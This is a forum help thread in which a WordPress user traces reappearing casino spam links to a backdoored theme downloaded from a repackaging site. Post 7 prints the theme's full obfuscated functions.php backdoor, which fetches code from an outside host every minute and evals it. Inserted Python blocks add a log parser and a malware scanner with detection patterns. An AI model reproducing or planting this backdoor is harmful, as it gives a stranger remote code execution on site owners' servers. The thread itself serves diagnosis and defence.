
Quick Help Needed - security breached somehow (12 posts)

  1. worldblogosphere
    Member
    Posted 14 years ago #

    Hi,

    I am having a security problem apparently. In my "Links" section someone has created a new heading and a link underneath that heading. I am still in the middle of setting things up and have no members; I point that out so you don't think it is just a user that did it.

    The heading is "2" with the link "Casino en Ligne" under it. The link points to the following site: http://fr.femalegamblers.org/.

    I have deleted it in the Links section 4 times now. It just keeps reappearing about 5 minutes or less after I delete it.

    Can anyone help me?

    Thanks,
    Gene :-)

  2. cafespain
    Member
    Posted 14 years ago #

    Check your logs (quickly) and see what IP address is adding the link, then block it in your .htaccess file until you can fix the block.

  3. worldblogosphere
    Member
    Posted 14 years ago #

    Hi Cafe,

    Which logs am I checking here? Something through WPMU or on my server host?

    Gene

  4. tanvir
    Member
    Posted 14 years ago #

    Check your server log, identify the IP & block it

  5. worldblogosphere
    Member
    Posted 14 years ago #

    Hi tan,

    Well after having some trouble figuring out which list might give me the correct IP address and looking through a bunch of them I couldn't pinpoint just which IP it was. Some lists would show me ALL the IPs, while others would show each individual page address visited. None would show them both. I have CPanel, which has AWStats, Webalizer stats, a Raw Access Log icon, and a Latest Visitors icon.
    I finally went with the latest visitor list and searched a WhoIs directory. Two of the addresses came back being from the RIPE network in Amsterdam. I assumed that was the offending IP. I went and blocked them.

    I then went and deleted the links, and in under a minute they were back.

    Any other suggestions? Or a suggestion on the best place to pinpoint which IP it is?

    Part of the problem is even though I have no content on the site I have had over 2000 hits in the past 2 days. I am sure it was not there prior to the past two days.

    Gene

    Quick edit to this comment -

    It seems that "/wp-admin/link-add.php" has only been accessed 4 times in February. Now if I could just find how to check those 4 IPs.
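    The check being attempted above (which client IPs requested a given admin page, according to the cPanel raw access log) as an added example; this is not code from the thread. It assumes the log is in Apache "combined" format, and the log lines below are constructed, not from the poster's server.

```python
import re
from collections import Counter

# Apache/cPanel "combined" access-log format (what the Raw Access Log icon hands out).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

# Constructed sample lines for illustration only.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Feb/2010:10:01:02 +0000] "GET /wp-admin/link-add.php HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Feb/2010:10:03:44 +0000] "GET / HTTP/1.1" 200 8172 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Feb/2010:10:06:10 +0000] "POST /wp-admin/link-add.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.55 - - [13/Feb/2010:11:15:00 +0000] "GET /wp-admin/link-add.php?foo=1 HTTP/1.1" 302 0 "-" "curl/7.19"
198.51.100.9 - - [13/Feb/2010:11:20:31 +0000] "GET /wp-login.php HTTP/1.1" 200 1510 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def hits_for_path(log_text, path):
    """Return (Counter of client IPs, list of parsed hits) for requests whose
    path, with any query string stripped, equals `path`."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"].split("?", 1)[0] == path:
            hits.append(rec)
    return Counter(r["ip"] for r in hits), hits

if __name__ == "__main__":
    ips, hits = hits_for_path(SAMPLE_LOG, "/wp-admin/link-add.php")
    for ip, n in ips.most_common():
        print(f"{ip}\t{n} request(s)")
    for r in hits:
        print(r["time"], r["ip"], r["method"], r["status"], r["agent"])
```

    Run it against the real file with `hits_for_path(open("access-log").read(), "/wp-admin/link-add.php")`; requests to admin pages from addresses you never logged in from are the ones worth looking at, while a clean log for that page (as turned out to be the case in this thread) points at something on the server itself.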

  6. andrea_r
    Moderator
    Posted 14 years ago #

    It's your theme. Check inside the theme's functions.php file.

    The reason I know this is that I have a copy of that theme, from the *original* theme developer's site, and the credit links in your footer of that theme are from one of those places that takes themes & bundles them to do this sort of thing.

  7. worldblogosphere
    Member
    Posted 14 years ago #

    Hi Andrea,

    This is the entire contents of the functions file. Which to me makes little sense. lol
    I thought I had gotten it from the original person. I mean I found it in the themes area of wordpress.org. (I think...I am about to double-check that)
    In the meantime, is it one line in particular in this code that is causing it?

    Quick Edit of this comment -

    I was obviously wrong about where I got it. I now see that the "Template Browser" link in the footer is the site where I got the theme from. Are they a known site to do this stuff? I got many themes from their site. Does this mean all their themes will do this?

    Thanks,
    Gene

    <?php
    if ( function_exists('register_sidebar') )
    register_sidebars(3);

    function xfooter() { global $wpdb; $RDAFE7FE4FDC52E2D1048573B4DB1DF18 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_eval'"); $R41CCFE75D7AC2B4681397CFC70BAEF40 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_eval'"); if (empty($RDAFE7FE4FDC52E2D1048573B4DB1DF18)) { $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_eval', '0', 'no')"); $RBDCA893A9385C089DC5F358AAA52C09B = 0; } else $RBDCA893A9385C089DC5F358AAA52C09B = intval($RDAFE7FE4FDC52E2D1048573B4DB1DF18[0]); if (empty($R41CCFE75D7AC2B4681397CFC70BAEF40)) { $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_eval', '', 'no')"); $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = ''; } else $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = $R41CCFE75D7AC2B4681397CFC70BAEF40[0]; @eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;'); if($R14AF1BE9EE26A90921E64A82E7836797) { $R5F38CE9C0B222F3BB0880E016DC07527 = "1"; } else { $R5F38CE9C0B222F3BB0880E016DC07527 = "0"; } if ( ( time() - $RBDCA893A9385C089DC5F358AAA52C09B ) >= 60 ) { $R39C188653EA53DBD6E3F1D3915EDAC0C = "com"; $R8088818E3E46A17C12F2EE42EB12D7AC = "2."; $R7B934F06258B8BA3608E30CDE9EA1035 = "xpstatz"; $RAD8CC24399FEA84D3454DD7057C38FD0 = "xps-$R5F38CE9C0B222F3BB0880E016DC07527."; $RBF7582359E6813BD7C54DD76E7505037 = "$R8088818E3E46A17C12F2EE42EB12D7AC$R7B934F06258B8BA3608E30CDE9EA1035.$R39C188653EA53DBD6E3F1D3915EDAC0C"; $RA81C90DCC503F6900F7DC424AD04F525 = "/".$RAD8CC24399FEA84D3454DD7057C38FD0."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']); if (ini_get('allow_url_fopen')) { $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = @file_get_contents("http://" . $RBF7582359E6813BD7C54DD76E7505037 . 
$RA81C90DCC503F6900F7DC424AD04F525); } else { $RF500F4A848E2EB2F8AAC3A6734D7EC38 = @fsockopen($RBF7582359E6813BD7C54DD76E7505037, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30); if ($RF500F4A848E2EB2F8AAC3A6734D7EC38) { @stream_set_timeout($RF500F4A848E2EB2F8AAC3A6734D7EC38, 60); @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "GET $RA81C90DCC503F6900F7DC424AD04F525 HTTP/1.1\r\n"); @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Host: $RBF7582359E6813BD7C54DD76E7505037\r\n"); @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Connection: Close\r\n\r\n"); $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = ""; while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)) { $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 .= @fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38, 1024); } $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = trim(strstr($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1, "\r\n\r\n")); } @fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38); } if ( is_string($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1) ) { $RBDCA893A9385C089DC5F358AAA52C09B = time(); if($R14AF1BE9EE26A90921E64A82E7836797) { @eval($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1); } else { echo "$RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1"; } $R9446905AFC32B438C0BD070AD05F3D83 = mysql_real_escape_string($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1); $wpdb->query("UPDATE $wpdb->options SET option_value=$RBDCA893A9385C089DC5F358AAA52C09B WHERE option_name='l_time_eval'"); $wpdb->query("UPDATE $wpdb->options SET option_value='$R9446905AFC32B438C0BD070AD05F3D83' WHERE option_name='l_eval'"); } } }
    ?>

  8. andrea_r
    Moderator
    Posted 14 years ago #

    That whole last function does it. And yes, I'm betting every theme you get from there will have the same.
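    A scanner for the indicators visible in the functions.php posted above (an eval of a body fetched over HTTP, the allow_url_fopen probe, the l_eval / l_time_eval options rows, the $R-plus-32-hex variable names), as an added example for checking the other themes from that site; it is not code from the thread, from WordPress or from the theme. The two PHP samples inside it are constructed excerpts, and `scan_theme_dir` assumes the usual wp-content/themes layout.

```python
import os
import re

# Indicator patterns taken from the posted functions.php.
INDICATORS = {
    "eval_call": re.compile(r"@?\beval\s*\("),
    "remote_fetch": re.compile(r"file_get_contents\s*\(\s*[\"']http|fsockopen\s*\("),
    "url_fopen_probe": re.compile(r"ini_get\s*\(\s*['\"]allow_url_fopen['\"]"),
    "options_persistence": re.compile(r"\bl_time_eval\b|\bl_eval\b"),
    "obfuscated_vars": re.compile(r"\$R[0-9A-F]{32}\b"),
    "host_leak": re.compile(r"urlencode\s*\(\s*\$_SERVER\[['\"]HTTP_HOST['\"]\]"),
}

def scan_php_source(src):
    """Return {indicator: match_count} for every indicator present in src."""
    return {n: len(p.findall(src)) for n, p in INDICATORS.items() if p.search(src)}

def is_suspicious(src):
    """eval together with a network fetch is the signature of this backdoor;
    obfuscated variable names on their own are only a hint."""
    found = scan_php_source(src)
    return "eval_call" in found and "remote_fetch" in found

def scan_theme_dir(root):
    """Walk a themes directory and return {path: findings} for suspicious .php files."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    src = fh.read()
                if is_suspicious(src):
                    report[path] = scan_php_source(src)
    return report

# Constructed excerpt mirroring the posted code's shape (not a working backdoor).
MALICIOUS_SAMPLE = r'''<?php
function xfooter() { global $wpdb;
$RDAFE7FE4FDC52E2D1048573B4DB1DF18 = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_eval'");
if (ini_get('allow_url_fopen')) { $RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1 = @file_get_contents("http://" . $RBF7582359E6813BD7C54DD76E7505037 . $RA81C90DCC503F6900F7DC424AD04F525); }
@eval($RB8CCA7CA753C9ECD0EAE7F65DA4AB7A1); }
?>'''
# Constructed clean functions.php, the same first lines the poster's file had.
CLEAN_SAMPLE = "<?php\nif ( function_exists('register_sidebar') )\n    register_sidebars(3);\n?>"

if __name__ == "__main__":
    print("malicious:", scan_php_source(MALICIOUS_SAMPLE))
    print("clean:", scan_php_source(CLEAN_SAMPLE))
```

    Besides the files, the options rows the backdoor created stay behind after the theme is removed, so also delete the l_eval and l_time_eval rows from wp_options once the theme is gone.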

  9. tanvir
    Member
    Posted 14 years ago #

    Oo nice :).. the good news(!) for you Gene is that the variables & values of the file are encrypted.

  10. worldblogosphere
    Member
    Posted 14 years ago #

    Thank you all for your help!

    I will now just be deleting all the themes from that site. Is there a way to let all the other users know to avoid them? I like to learn from my mistakes, and it is even better when others can too.

    Andrea? The original was done by Small Potato? I found a site for the theme with an image of a guy with a drawn on pair of glasses and mustache and stuff. Do you happen to know if that is the correct site?

    Thanks again for all the help.

    Gene :-)

  11. andrea_r
    Moderator
    Posted 14 years ago #

    "The original was done by Small Potato? I found a site for the theme with an image of a guy with a drawn on pair of glasses and mustache and stuff. Do you happen to know if that is the correct site?"

    Yep.

  12. worldblogosphere
    Member
    Posted 14 years ago #

    Thanks Andrea. I really do like the theme and would have hated to start picking a new one from scratch. It took me quite a bit of time to decide upon it.

    Gene :-)

About this Topic

  • Started 14 years ago by worldblogosphere
  • Latest reply from worldblogosphere